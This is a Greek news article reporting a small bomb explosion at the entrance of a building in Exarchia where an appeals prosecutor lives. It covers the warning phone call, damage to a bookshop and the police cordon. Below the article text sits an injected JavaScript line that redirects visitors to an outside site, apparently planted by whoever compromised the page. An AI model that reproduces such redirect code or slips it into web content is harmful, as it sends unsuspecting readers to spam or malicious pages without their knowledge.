Έκρηξη στην είσοδο πολυκατοικίας όπου διαμένει η εισαγγελέας Εφετών Γ. Τσατάνη, στα Εξάρχεια

0
7

 

Έκρηξη αυτοσχέδιου μηχανισμού σημειώθηκε περίπου στις 10.45 το βράδυ της Τετάρτης στην οδό Ιπποκράτους 112, στα Εξάρχεια.

Σύμφωνα με τις πληροφορίες, ο μηχανισμός ήταν μικρής ισχύος ωστόσο, ιδιαίτερη ανησυχία προκαλεί στις Αρχές το γεγονός ότι η ο εκρηκτικός μηχανισμός είχε τοποθετηθεί στην είσοδο της πολυκατοικίας στην οποία διαμένει η εισαγγελέας Εφετών, Γεωργία Τσατάνη, σύμφωνα με τον δικηγόρο της Θέμη Σοφό.
Από την έκρηξη προκλήθηκαν ζημιές στο βιβλιοπωλείο «Ελεύθερη Σκέψη», έξω από το οποίο εξερράγη ο μηχανισμός, χωρίς ευτυχώς να υπάρξουν τραυματισμοί.

Επιπλέον, έσπασαν τζάμια στις παρακείμενες πολυκατοικίες, ενώ η περιοχή αποκλείστηκε από ισχυρές αστυνομικές δυνάμεις που έσπευσαν στο σημείο.

Είχε προηγηθεί τηλεφώνημα άνδρα στις 22:20 στα γραφεία της «Εφημερίδας των Συντακτών» και στην ιστοσελίδα Zougla.gr. Ο άνδρας ανέφερε ότι έχει τοποθετηθεί εκρηκτικός μηχανισμός σε βιβλιοπωλείο στην οδό Ιπποκράτους 112, στα Εξάρχεια και έκλεισε λέγοντας: «Πες στην αστυνομία ότι θα μαζεύει τους ανθρώπους από τα παράθυρα».

Η έκρηξη σημειώθηκε στις 22.50, στον χρόνο που αναφέρθηκε στο προειδοποιητικό τηλεφώνημα.

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here